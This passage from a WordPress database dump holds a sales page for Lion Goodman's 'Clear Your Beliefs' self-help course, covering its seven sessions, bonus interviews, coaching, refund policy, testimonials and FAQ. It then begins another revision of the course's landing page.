subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n\n&nbsp;\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center">OR</p>\n\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n\n<strong>– G. J., software developer</strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n\n<strong>~ S.K., Life Coach, Ontario, Canada </strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n\n<strong>~ D. T., Physical Therapist, Denver, CO </strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n\n<strong>~ T. L., Healer, Stamford, CT </strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n\n<strong>~ C.T., Performance and Life Coach</strong><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n\n<strong>– M.M., International Business Consultant</strong>&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center">OR</p>\n\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a>\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//\n\n&nbsp;', 'Partners', '', 'inherit', 'open', 'open', '', '2161-autosave-v1', '', '', '2015-05-12 13:16:19', '2015-05-12 18:16:19', '', 2161, 'http://clearyourbeliefs.com/2161-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2172, 2, '2015-05-12 13:19:32', '2015-05-12 18:19:32', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady 